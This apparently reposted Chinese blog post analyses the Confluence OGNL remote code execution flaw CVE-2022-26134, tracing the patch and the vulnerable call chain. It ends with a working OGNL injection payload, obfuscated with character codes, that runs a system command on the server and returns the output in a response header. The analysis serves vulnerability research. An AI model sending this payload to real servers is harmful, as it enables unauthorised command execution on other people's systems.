CVE-2022-26134 Confluence Server Data Center OGNL RCE
2022-6-8 10:42:27 Author: y4er.com(查看原文) 阅读量:24 收藏

移除了com.opensymphony.xwork.util.TextParseUtil#translateVariables的调用,跟进这个函数发现这里是ognl表达式执行点。

然后走到com.atlassian.confluence.servlet.ConfluenceServletDispatcher#serviceAction ConfluenceServletDispatcher是ServletDispatcher的子类

在serviceAction中先调用createActionProxy创建一个代理对象,然后调用代理对象的execute函数,在代理对象中我们的payload保存至namespace字段

然后将自身this传递给interceptor.intercept(this),以com.opensymphony.xwork.interceptor.AroundInterceptor拦截器为例,仍会调用invocation.invoke()

其中notpermitted对应的result类为com.opensymphony.xwork.ActionChainResult,所以会进入com.opensymphony.xwork.ActionChainResult#execute

v7.15开始,Confluence在OGNL表达式解析时加入了沙箱设置。在com.opensymphony.xwork.util.TextParseUtil#translateVariables调用ognl时使用findValue

1

${Class.forName("com.opensymphony.webwork.ServletActionContext").getMethod("getResponse",null).invoke(null,null).setHeader("X-CMD",Class.forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("nashorn").eval("eval(String.fromCharCode(118,97,114,32,115,61,39,39,59,118,97,114,32,112,112,32,61,32,106,97,118,97,46,108,97,110,103,46,82,117,110,116,105,109,101,46,103,101,116,82,117,110,116,105,109,101,40,41,46,101,120,101,99,40,39,105,100,39,41,46,103,101,116,73,110,112,117,116,83,116,114,101,97,109,40,41,59,119,104,105,108,101,32,40,49,41,32,123,118,97,114,32,98,32,61,32,112,112,46,114,101,97,100,40,41,59,105,102,32,40,98,32,61,61,32,45,49,41,32,123,98,114,101,97,107,59,125,115,61,115,43,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,98,41,125,59,115))"))}

文章来源: https://y4er.com/posts/cve-2022-26134-confluence-server-data-center-ognl-rce/
如有侵权请联系:admin#unsafe.sh